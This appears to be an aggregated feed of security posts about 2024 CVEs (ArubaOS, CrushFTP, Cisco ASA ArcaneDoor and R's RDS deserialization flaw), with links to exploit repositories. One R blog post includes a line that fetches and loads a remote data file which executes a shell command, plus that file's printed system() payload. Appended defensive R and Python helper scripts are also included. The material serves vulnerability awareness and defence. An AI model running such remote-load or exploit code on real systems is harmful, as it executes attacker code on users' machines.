#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_26304 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday
##CVE-2024-26304: CVSS 9.8
There is a buffer overflow vulnerability in the underlying L2/L3 Management service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.
CVSS 9.8 Buffer overflow -> RCE in ArubaOS:
There is a buffer overflow vulnerability in the underlying Utility daemon that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system. Note that it says "results in the ability," not "may result in the ability" to execute remote code.
Affected Products
=================
HPE Aruba Networking
- Mobility Conductor (formerly Mobility Master)
- Mobility Controllers
- WLAN Gateways and SD-WAN Gateways managed by Aruba Central
Affected Software Versions:
- ArubaOS 10.5.x.x: 10.5.1.0 and below
- ArubaOS 10.4.x.x: 10.4.1.0 and below
- ArubaOS 8.11.x.x: 8.11.2.1 and below
- ArubaOS 8.10.x.x: 8.10.0.10 and below
The following ArubaOS and SD-WAN software versions that are End of Maintenance are affected by these vulnerabilities and are not patched by this advisory:
- ArubaOS 10.3.x.x: all
- ArubaOS 8.9.x.x: all
- ArubaOS 8.8.x.x: all
- ArubaOS 8.7.x.x: all
- ArubaOS 8.6.x.x: all
- ArubaOS 6.5.4.x: all
- SD-WAN 8.7.0.0-2.3.0.x: all
- SD-WAN 8.6.0.4-2.2.x.x: all
updated 2024-05-01T19:50:25.633000
4 posts
Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities
Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability [sic] that is described in this advisory.
#CVE_2024_20357 #CVE_2024_20376 #CVE_2024_20378 #Cisco #PatchTuesday #vulnerability
##updated 2024-05-01T18:31:25
4 posts
Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities
Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability [sic] that is described in this advisory.
#CVE_2024_20357 #CVE_2024_20376 #CVE_2024_20378 #Cisco #PatchTuesday #vulnerability
##updated 2024-05-01T18:31:20
4 posts
SonicWall security advisory: GMS ECM MULTIPLE VULNERABILITIES
Affected Products: GMS (Virtual Appliance, Windows) - 9.3.4 and earlier versions. Fixed software: 9.4.0 (Build 9.4-9400.1040) and later versions. Not exploited.
#SonicWall #PatchTuesday #vulnerability #SonicWallGMS #CVE_2024_29010 #CVE_2024_29011
##updated 2024-05-01T18:31:19
4 posts
Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities
Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability [sic] that is described in this advisory.
#CVE_2024_20357 #CVE_2024_20376 #CVE_2024_20378 #Cisco #PatchTuesday #vulnerability
##updated 2024-05-01T18:15:24.140000
2 posts
Flatpak just received a new update 👀
New features:
Bug fixes:
Internal changes:
updated 2024-05-01T18:15:13.200000
1 posts
3 repos
https://github.com/Notselwyn/CVE-2024-1086
updated 2024-05-01T15:30:44
8 posts
HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:
3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:
They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS
#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday
##CVE-2024-33511: CVSS 9.8
There is a buffer overflow vulnerability in the underlying Automatic Reporting service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system. Again, "results in."
updated 2024-05-01T15:30:44
4 posts
HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:
3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:
They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS
#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday
##updated 2024-05-01T15:30:37
2 posts
1 repos
https://github.com/Roud-Roud-Agency/CVE-2024-26304-RCE-exploits
HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:
3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:
They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS
#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday
##updated 2024-04-29T21:30:34
28 posts
Vulnerability in R Programming Language Could Fuel Supply Chain Attacks https://www.securityweek.com/vulnerability-in-r-programming-language-enables-supply-chain-attacks/ #Vulnerabilities #vulnerability #CVE202427322 #Featured
##CISA: CERT/CC Reports R Programming Language Vulnerability
I ignored this one but even CISA thinks it's worth mentioning: CVE-2024-27322 (8.8 high) Deserialization of untrusted data in R statistical #Rstats programming language could allow for arbitrary code execution. A cyber threat actor could exploit this vulnerability to take control of an affected system.
Direct link to CERT/CC advisory.
CVE-2024-27322 Should Never Have Been Assigned And R Data Files Are Still Super Risky Even In R 4.4.0 – Source: securityboulevard.com https://ciso2ciso.com/cve-2024-27322-should-never-have-been-assigned-and-r-data-files-are-still-super-risky-even-in-r-4-4-0-source-securityboulevard-com/ #rssfeedpostgeneratorecho #SecurityBloggersNetwork #CyberSecurityNews #SecurityBoulevard #R
##I ended up having to burn time I honestly don't have this week to blog the stuff from the repo I made yesterday due to CERT and CISA making a big deal (https://www.cisa.gov/news-events/alerts/2024/05/01/certcc-reports-r-programming-language-vulnerability) out of expected behavior in #RStats due to a daft, hype-seeking vendor.
The profession that is cybersecurity is stupid broken.
I rly want (someone) to pwn an org with this CVE just to get it on KEV for sad posterity.
##I had not planned to blog this (this is an incredibly time-crunched week for me) but CERT/CC and CISA made a big deal out of a non-vulnerability in R, and it’s making the round on socmed, so here we are.
A security vendor decided to try to get some hype before 2024 RSAC and made a big deal out of what was/is known expected behavior in R data files. R Core took some measures to address the issue they outlined, but for the love of Henry, PLEASE do not think R data files are safe to handle if you weren’t the one creating them, or you do not fully know the provenance of them.
Konrad Rudolph and Iakov Davydov did some ace cyber sleuthing and figured out other ways R data file deserialization can be abused. Please take a moment and drop a note on Mastodon to them saying “thank you”. This is excellent work. We need more folks like them in this ecosystem.
Like many programming languages, R has many footguns, and R data files are one of them. R objects are wonderful beasts, and being able to serialize and deserialize those beasts is a super helpful bit of functionality. Also, R has something called active bindings. Amongst other things, they let you access an object to get a value, but — in doing so — code can get executed without you knowing it. Whether an R data file has an object with active bindings or not, it can be abused by attackers.
When you `load()` an R data file directly into your R session and into the global environment, the object(s) in it will, well, load there. So, if it has an object named `print` that’s going to be in your global environment and get called when `print()` gets called. Lather/rinse/repeat for any other object name. It should be pretty obvious how this could be abused.
A tad more insidious is what happens when you quit R. By default, on `quit()`, unless you specify otherwise, that function invocation will also call `.Last()` if it exists in the environment. This functionality exists in the event things need to be cleaned up. One “nice” aspect of `.`-prefixed R objects is that they’re hidden by default from the environment. So, you may not even notice if an R data file you’ve loaded has that defined. (You likely do not check what’s loaded anyway.)
It’s also possible to create custom R objects that have their own “finalizers” (ref `reg.finalizer`), which will also get called by default when the objects are being destroyed on quit.
There are also likely other ways to trigger unwanted behavior.
If you want to see how this works, start R from RStudio, the command line, or R GUI. Then, execute the following R code:

```r
load(url("https://github.com/hrbrmstr/rdaradar/raw/main/exploit.rda"))
```

Then, quit R/RStudio/R GUI (this will be less dramatic on Linux, but the demo should still be effective).
If you must take in untrusted R data files, keep reading.
I threw together an R script along with a safer way to use it (a Docker container) to help R folks inspect the contents of R data files before actually using them. It also looks for some basic shady stuff and alerts you if it finds them. It’s a WIP, and issues + thoughtful PRs are welcome.
If one were to run `Rscript check.R` from that repo with that `exploit.rda` file as a parameter, one would see this:
```text
-----------------------------------------------
Loading R data file in quarantined environment…
-----------------------------------------------
Loading objects:
  .Last
  quit
-----------------------------------------
Enumerating objects in loaded R data file
-----------------------------------------
.Last : function (...)
  - attr(*, "srcref")= 'srcref' int [1:8] 1 13 6 1 13 1 1 6
  ..- attr(*, "srcfile")=Classes 'srcfilecopy', 'srcfile' <environment: 0x12cb25f48>
quit : function (...)
  - attr(*, "srcref")= 'srcref' int [1:8] 1 13 6 1 13 1 1 6
  ..- attr(*, "srcfile")=Classes 'srcfilecopy', 'srcfile' <environment: 0x12cb25f48>
------------------------------------
Functions found: enumerating sources
------------------------------------
Checking `.Last`…
!! `.Last` may execute arbitrary code on your system under certain conditions !!
`.Last` source:
{
  cmd = if (.Platform$OS.type == "windows") "calc.exe" else if (grepl("^darwin", version$os)) "open -a Calculator.app" else "echo pwned\\!"
  system(cmd)
}
Checking `quit`…
!! `quit` may execute arbitrary code on your system under certain conditions !!
`quit` source:
{
  cmd = if (.Platform$OS.type == "windows") "calc.exe" else if (grepl("^darwin", version$os)) "open -a Calculator.app" else "echo pwned\\!"
  system(cmd)
}
```
There’s info in the repo on how to use that with Docker.
The big takeaway is (again) to not trust R data files you did not create or know the full provenance of. If you have an internet-facing Shiny app or Plumber API that takes R data files as input, get it off the internet and figure out some other way to take in the input.
While I fully disagree with the assignment of the CVE, I’m at least glad this situation brought attention to this very dangerous aspect of handling this type of file format in R.
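An added example in the spirit of the post above (not code from the rdaradar repo or from R Core): a minimal inspector that loads an R data file into a quarantined environment and flags the patterns the post describes (`.Last`/`.First`, functions shadowing base R names, active bindings, function bodies that reach for the shell). `sample.rda` is a constructed file name; run this in a throwaway container on R >= 4.4.0, since a promise or active binding in the file can still execute code the moment a value is read.

```r
# Added example, not the rdaradar check.R: quarantine-and-enumerate an .rda file.
# Names of functions whose presence in a *data* file deserves scrutiny
# (the post's exploit.rda defines `quit` and `.Last`, both calling system()).
suspicious_calls <- c("system", "system2", "shell", "pipe", "eval", "parse",
                      "source", "download.file", "url", "unlink", "Sys.setenv")

inspect_rda <- function(path) {
  # Quarantine: a fresh environment, so nothing in the file lands in .GlobalEnv
  # where an object named `print` or `quit` would silently replace the real one.
  quarantine <- new.env(parent = emptyenv())
  load(path, envir = quarantine)

  findings <- character(0)
  note <- function(nm, msg) findings <<- c(findings, sprintf("%-12s %s", nm, msg))

  # all.names = TRUE, otherwise dot-prefixed objects such as `.Last` stay hidden
  for (nm in ls(quarantine, all.names = TRUE)) {
    if (nm %in% c(".Last", ".First"))
      note(nm, "startup/shutdown hook: runs automatically if it reaches .GlobalEnv")

    # Test for active bindings BEFORE reading the value: get()/str() on an
    # active binding calls its function, which is exactly the footgun in question.
    if (bindingIsActive(nm, quarantine)) {
      note(nm, "active binding: reading this object executes code")
      next
    }
    # On R < 4.4.0 a serialized promise would be forced here; hence the container.
    obj <- get(nm, envir = quarantine)

    if (is.function(obj)) {
      if (exists(nm, envir = baseenv(), inherits = FALSE))
        note(nm, "function shadowing a base R function of the same name")
      src <- paste(deparse(obj), collapse = "\n")
      hits <- suspicious_calls[vapply(suspicious_calls, function(f)
        grepl(paste0("\\b", f, "\\s*\\("), src, perl = TRUE), logical(1))]
      if (length(hits))
        note(nm, paste("function calls", paste(hits, collapse = ", ")))
    } else if (is.environment(obj)) {
      # Environments can carry their own active bindings and, via reg.finalizer(),
      # code that runs when they are garbage-collected on quit.
      inner <- ls(obj, all.names = TRUE)
      active <- inner[vapply(inner, bindingIsActive, logical(1), env = obj)]
      note(nm, sprintf("environment with %d bindings (%d active); may carry a finalizer",
                       length(inner), length(active)))
    }
  }
  # Nothing from the file survives: the quarantine environment dies with this call.
  if (length(findings) == 0) "no suspicious objects found" else findings
}

cat(inspect_rda("sample.rda"), sep = "\n")
```

Against the post's exploit.rda this reports `.Last` as a shutdown hook calling `system`, and `quit` as a base-shadowing function calling `system`.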
##The vulnerability, tagged CVE-2024-27322, can be exploited by tricking someone into loading a maliciously crafted RDS (R Data Serialization) file into an R-based project, or by fooling them into integrating a poisoned R package into a code base. https://www.theregister.com/2024/05/01/r_programming_language_ace_vuln/
##JVNVU#96606632: Insecure data deserialization issue in the implementation of the R programming language (CVE-2024-27322) : 👀
---
https://jvn.jp/vu/JVNVU96606632/
##A vulnerability (CVE-2024-27322) has been found in R versions 1.4.0 to 4.3.3. It's patched in 4.4.0 (24 April 2024), so you will be wanting to upgrade. #RStats
https://www.kb.cert.org/vuls/id/238194
@hrbrmstr @joranelias @Lluis_Revilla @brodriguesco @idavydov Right, it’s as much “expected behaviour” as in CVE-2024-27322, and as in other serialisation engines (e.g. Python pickle, .net BinaryFormatter, etc.). Which are all systems that are very hard to use correctly, and cause frequent direct vulnerabilities. Whether that makes the serialisation frameworks themselves a vulnerability… 🤷
(I did not register a CVE; for me this is an issue of awareness and documentation.)
##@klmr @Lluis_Revilla I do agree that if you exploit a bug in the RDS parser and cause code execution this way, that's a terrible bug that must be fixed ASAP. But you can also, besides unserializing a promise, unserialize a lot of other well-formed things that would execute code upon being evaluated or printed, and that's R working by design. CVE-2024-27322 does not overflow stack or use-after-free in the parser, it just unserializes a promise. R's lazy evaluation relies on promises being serializable.
It would be great to have a safe (un-)serialization function, but the current system by itself doesn't deserve a CVE.
##CVE-2024-27322, if you missed this. #cybersecurity #infosec
Vulnerability in R Programming Language Enables Supply Chain Attacks https://www.securityweek.com/vulnerability-in-r-programming-language-enables-supply-chain-attacks/ @SecurityWeek
##The CVE-2024-27322 security vulnerability in R's deserialization process gives attackers a way to execute arbitrary code in target environments via specially crafted files. https://www.darkreading.com/application-security/r-programming-language-exposes-orgs-to-supply-chain-risk
##🚨Looks like #RStats was not immune to deserialization bugs after all https://hiddenlayer.com/research/r-bitrary-code-execution/
Watch those R Data files (and, we now should come up with better ways to ensure local R library integrity)!!
CVE-2024-27322
##As has been making the rounds, R version 4.4.0 patched a security issue:
https://hiddenlayer.com/research/r-bitrary-code-execution/
https://www.kb.cert.org/vuls/id/238194
https://nvd.nist.gov/vuln/detail/CVE-2024-27322
However, as noted on R-help, the issue runs much deeper:
https://stat.ethz.ch/pipermail/r-help/2024-May/479281.html
If I understand this correctly, avoiding external .rdata/.rds files from untrusted sources seems prudent.
Update your Rs!
4.4.0 patched CVE-2024-27322, detailed below:
https://www.theregister.com/2024/05/01/r_programming_language_ace_vuln/
##updated 2024-04-29T09:31:52
1 posts
3 repos
https://github.com/truonghuuphuc/CVE-2024-27956
https://github.com/diego-tella/CVE-2024-27956-RCE
https://github.com/X-Projetion/CVE-2024-27956-WORDPRESS-RCE-PLUGIN
Hackers Exploit WP-Automatic Plugin Vulnerability, Threatening WordPress Site Security https://thecyberexpress.com/wp-automatic-plugin-vulnerability/ #WPAutomaticpluginvulnerabilities #WPAutomaticPluginVulnerability #criticalvulnerability #TheCyberExpressNews #WPAutomaticplugin #Vulnerabilities #TheCyberExpress #FirewallDaily #CVE202427956
##updated 2024-04-26T15:32:22.523000
2 posts
QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)
QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.
#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766
##updated 2024-04-26T15:30:39
2 posts
1 repos
##updated 2024-04-26T15:25:47.270000
27 posts
9 repos
https://github.com/Mohammaddvd/CVE-2024-4040
https://github.com/rbih-boulanouar/CVE-2024-4040
https://github.com/airbus-cert/CVE-2024-4040
https://github.com/gotr00t0day/CVE-2024-4040
https://github.com/Praison001/CVE-2024-4040-CrushFTP-server
https://github.com/jakabakos/CVE-2024-4040-CrushFTP-File-Read-vulnerability
https://github.com/tucommenceapousser/CVE-2024-4040-Scanner
CrushFTP VFS Sandbox Escape Vulnerability (CVE-2024-4040) https://fortiguard.fortinet.com/threat-signal-report/5431
##Rapid7 now has a full technical analysis of #CrushFTP CVE-2024-4040 available in AttackerKB (with many thanks to @fuzz for the great work!) https://attackerkb.com/topics/20oYjlmfXa/cve-2024-4040/rapid7-analysis
##While everyone's freaking out about Cisco, CISA added CrushFTP's actively exploited zero-day CVE-2024-4040 to the Known Exploited Vulnerabilities (KEV) Catalog: 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
#zeroday #vulnerability #CVE_2024_4040 #CrushFTP #eitw #activeexploitation #CISA #KnownExploitedVulnerabilitiesCatalog
##@h4sh I'm unfamiliar with the CVE process. NVD's information hasn't updated yet, which I assume eventually updates from cve.org. Do you know when NVD's information will reflect cve.org's? @todb
##Due to new information, CVE-2024-4040 is now an unauthenticated remote code execution via template injection (CVSS 9.8). Multiple sources of new information have confirmed this. The CVE record has been updated.
https://www.cve.org/CVERecord?id=CVE-2024-4040
> A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server.
##Rapid7 researcher @fuzz analyzed #CrushFTP CVE-2024-4040 and found that it's not only exploitable for arbitrary file read as root, but also authentication bypass for admin access and full RCE. Patch immediately. https://www.rapid7.com/blog/post/2024/04/23/etr-unauthenticated-crushftp-zero-day-enables-complete-server-compromise/
##@h4sh Rapid7 has a much more severe analysis of CVE-2024-4040, the actively exploited CrushFTP zero-day. 🔗 https://www.rapid7.com/blog/post/2024/04/23/etr-unauthenticated-crushftp-zero-day-enables-complete-server-compromise/
Rapid7’s vulnerability research team analyzed CVE-2024-4040 and determined that it is fully unauthenticated and trivially exploitable; successful exploitation allows for not only arbitrary file read as root, but also authentication bypass for administrator account access and full remote code execution. Successful exploitation allows a remote, unauthenticated attacker to access and potentially exfiltrate all files stored on the CrushFTP instance.
Although the vulnerability has been formally described as an arbitrary file read, Rapid7 believes that it can be more accurately categorized as a server-side template injection (SSTI).
#zeroday #vulnerability #CVE_2024_4040 #CrushFTP #eitw #activeexploitation
##Exploit from airbus-cert is out for #crushFTP CVE-2024-4040
Expect more in the wild exploitation in the coming days.. https://infosec.exchange/@wvu/112320211100310152
##h/t @JohnHammond https://github.com/airbus-cert/CVE-2024-4040
##CrushFTP zero-day exploited by attackers, upgrade immediately! (CVE-2024-4040) https://www.helpnetsecurity.com/2024/04/23/cve-2024-4040/ #CrowdStrike #enterprise #Don'tmiss #Hotstuff #CrushFTP #exploit #Censys #News #CVE #FTP
##Here's a #nuclei template to detect potentially unpatched #CrushFTP 10.x servers against CVE-2024-4040.
Note that the templates do NOT exploit the vuln and are not remotely related to a POC. Attackers will likely find these useless because they are.
##@campuscodi Kudos to @h4sh for assigning the CVE to the actively exploited CrushFTP zero-day: https://infosec.exchange/@h4sh/112316550866303546
According to his analysis and patch diffing, the CVSSv3 score for CVE-2024-4040 is 7.7 HIGH: Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
Did some patch diffing on the new #crushFTP bug, and it does look like the bug has 2 components and at least one of them needs some form of authentication to exploit (need creation of something).
After the first stage, the reading of the file outside of VFS sandbox might not need authentication. I am not sure.
#CrushFTP #zeroday #vulnerability #CVE_2024_4040 #eitw #activeexploitation
##The CrushFTP zero-day is now CVE-2024-4040
##Shoutout to @h4sh for getting a CVE ID assigned to this actively exploited zero-day CrushFTP vulnerability: CVE-2024-4040 (reported by Simon Garrelou, of Airbus CERT). https://www.cve.org/CVERecord?id=CVE-2024-4040
VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.
#zeroday #eitw #activeexploitation #CrushFTP #vulnerability #CVE_2024_4040
##I bring you CVE-2024-4040: VFS Sandbox Escape in #CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.
https://www.cve.org/CVERecord?id=CVE-2024-4040
If anyone disagrees with our CVSS analysis, please let me know & bring proof
##updated 2024-04-26T15:25:02.773000
54 posts
2 repos
https://github.com/west-wind/Threat-Hunting-With-Splunk
https://github.com/Garvard-Agency/CVE-2024-20359-CiscoASA-FTD-exploit
Censys: Analysis of ArcaneDoor Threat Infrastructure Suggests Potential Ties to Chinese-based Actor
After the Cisco zero-days from last week (CVE-2024-20353 which is 8.6 high, and CVE-2024-20359 at 6.0 medium, disclosed 24 April 2024 by Cisco as exploited zero-days), Censys investigated the actor-controlled IPs provided by Talos in Censys data and cross-referenced them with other certificate indicators. They discovered "compelling data" suggesting the potential involvement of a China-based actor, including links to multiple major Chinese networks and the presence of Chinese-developed anti-censorship software. Cisco didn't outright say China, but Censys has.
#Cisco #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #UAT4356 #threatintel
##The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.
It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.
#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw
##The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.
As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.
www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353
Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.
If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.
blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/
#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359
Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs
#Cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356 #CISA #KnownExploitedVulnerabilitiesCatalog #KEV
##So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/), first things first:
"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."
This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.
What you should do is (I'll quote):
- Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the `system support diagnostic-cli` command.
- Use the `enable` command to change into privileged EXEC mode. Note: On devices that are running Cisco FTD Software, the enable password is blank.
- Collect the outputs of the following commands:
  - `show version`
  - `verify /SHA-512 system:memory/text`
  - `debug menu memory 8`
- Open a case with the Cisco Technical Assistance Center (TAC, https://www.cisco.com/c/en/us/support/index.html). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.
Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from getting reinfected.
I will repeat (without shouting this time):
"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."
There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the Cisco advisory page (https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response), but it is also local (not "network"), so I guess that won't save anyone from reinfection either. But that's just me guessing.
#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity
Final question for anyone still reading: why the debug menu memory 8? What does it do?
I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:
cc: @todb @campuscodi @mttaggart @DaveMWilburn
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
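Added example, not from the post above or from Cisco: a small Python triage helper for the collection step quoted there. It parses saved show version and verify /SHA-512 system:memory/text captures, compares the in-memory text-segment digest against a baseline taken from a known-good device on the same release, and hashes every artifact for the TAC upload. The baseline digests, the sample captures and the exact wording of the verify output are constructed assumptions, not real Cisco values.

```python
import hashlib
import re
from dataclasses import dataclass
from typing import Dict, Optional

# ASA's `show version` reports the running release as
# "Cisco Adaptive Security Appliance Software Version 9.16(4)8".
VERSION_RE = re.compile(r"Adaptive Security Appliance Software Version\s+(\S+)")
# The verify command prints a SHA-512 as 128 hex characters; matching the
# digest itself keeps the parser tolerant of wording differences between
# releases (the surrounding text in the samples below is constructed).
SHA512_RE = re.compile(r"\b([0-9a-fA-F]{128})\b")

# Hypothetical baseline: SHA-512 of system:memory/text captured from a
# known-good device running the same release and image. Constructed values.
BASELINE: Dict[str, str] = {
    "9.16(4)8": hashlib.sha512(b"constructed known-good lina text segment").hexdigest(),
}


@dataclass
class Triage:
    version: Optional[str]
    memory_text_sha512: Optional[str]
    baseline_sha512: Optional[str]
    verdict: str  # "match", "mismatch", "no-baseline" or "unparsed"
    advice: str


def parse_version(show_version_output: str) -> Optional[str]:
    """Extract the running ASA release from `show version` output."""
    m = VERSION_RE.search(show_version_output)
    return m.group(1) if m else None


def parse_memory_text_hash(verify_output: str) -> Optional[str]:
    """Extract the digest from `verify /SHA-512 system:memory/text` output."""
    m = SHA512_RE.search(verify_output)
    return m.group(1).lower() if m else None


def triage(show_version_output: str, verify_output: str,
           baseline: Dict[str, str] = BASELINE) -> Triage:
    """Compare the captured in-memory digest with the baseline for that release."""
    version = parse_version(show_version_output)
    digest = parse_memory_text_hash(verify_output)
    if version is None or digest is None:
        return Triage(version, digest, None, "unparsed",
                      "Could not parse the collected outputs; re-capture them "
                      "verbatim before doing anything else to the device.")
    expected = baseline.get(version)
    if expected is None:
        return Triage(version, digest, None, "no-baseline",
                      "No known-good digest for this release; obtain one from a "
                      "trusted device on the same image or let TAC compare.")
    if digest == expected.lower():
        return Triage(version, digest, expected, "match",
                      "In-memory text segment matches the baseline.")
    return Triage(version, digest, expected, "mismatch",
                  "In-memory text segment differs from the baseline: treat the "
                  "device as compromised, do NOT reboot or core-dump it, and "
                  "open a TAC case referencing ArcaneDoor.")


def build_manifest(artifacts: Dict[str, str]) -> Dict[str, str]:
    """SHA-256 each collected output so the TAC upload can be verified later."""
    return {name: hashlib.sha256(text.encode()).hexdigest()
            for name, text in artifacts.items()}


# Constructed sample captures (not real device output).
SAMPLE_SHOW_VERSION = (
    "Cisco Adaptive Security Appliance Software Version 9.16(4)8\n"
    "Device Manager Version 7.18(1)\n"
)
SAMPLE_VERIFY_GOOD = "verify /SHA-512 (system:memory/text) = " + BASELINE["9.16(4)8"]
SAMPLE_VERIFY_BAD = ("verify /SHA-512 (system:memory/text) = "
                     + hashlib.sha512(b"constructed tampered lina text segment").hexdigest())

if __name__ == "__main__":
    for label, verify_out in (("good", SAMPLE_VERIFY_GOOD), ("bad", SAMPLE_VERIFY_BAD)):
        result = triage(SAMPLE_SHOW_VERSION, verify_out)
        print(f"{label}: {result.verdict} -> {result.advice}")
    print(build_manifest({"show_version.txt": SAMPLE_SHOW_VERSION,
                          "verify_memory_text.txt": SAMPLE_VERIFY_GOOD}))
```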
